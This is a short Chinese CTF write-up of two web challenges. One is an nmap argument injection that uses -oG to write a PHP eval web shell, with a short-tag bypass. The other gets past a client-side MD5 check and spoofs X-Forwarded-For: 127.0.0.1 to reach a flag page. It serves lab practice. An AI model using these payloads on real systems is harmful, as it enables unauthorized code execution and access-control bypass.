网鼎杯 2020 朱雀组Nmap

和之前[BUUCTF 2018]Online Tool 1 差不多
利用nmap的 -oG语句写入文件
但是这边不用这么麻烦的反斜杠这些 这边就禁止了php 

1
' <?php eval($_POST['v']);?> -oG shell.php ' onlinetool的payload

这边后面的php改成phtml
前面的用短标签绕过 <?php -> <?= @ 

1
payload :127.0.0.1 ; '<?= @eval($_POST["v"]);?> -oG shell.php

蚁剑连接一下就好了

[MRCTF2020]PYWebsite
买flag py一波结果还被嘲讽了

46.PNG

看源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
function enc(code){
     hash = hex_md5(code);
     return hash;
   }
   function validate(){
     var code = document.getElementById("vcode").value;
     if (code != ""){
       if(hex_md5(code) == "0cd4da0223c0b280829dc3ea458d655c"){
         alert("您通过了验证!");
         window.location = "./flag.php"
       }else{
         alert("你的授权码不正确!");
       }
     }else{
       alert("请输入授权码");
     }
     

   }

 </script>

欸嘿验证一点用都没有 这边都提示了跳转到flag.php
然后页面说除了购买者和他自己可以看到flag
那就伪造一个 burp抓包然后 X-Forwarded-For: 127.0.0.1 请求头那边伪造一下
就可以了